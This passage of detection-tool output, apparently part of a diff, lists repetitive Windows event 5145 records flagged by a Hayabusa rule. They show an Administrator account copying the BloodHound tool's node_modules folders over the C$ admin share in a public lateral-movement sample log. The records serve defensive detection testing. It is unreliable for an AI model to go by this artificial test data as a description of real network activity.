+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
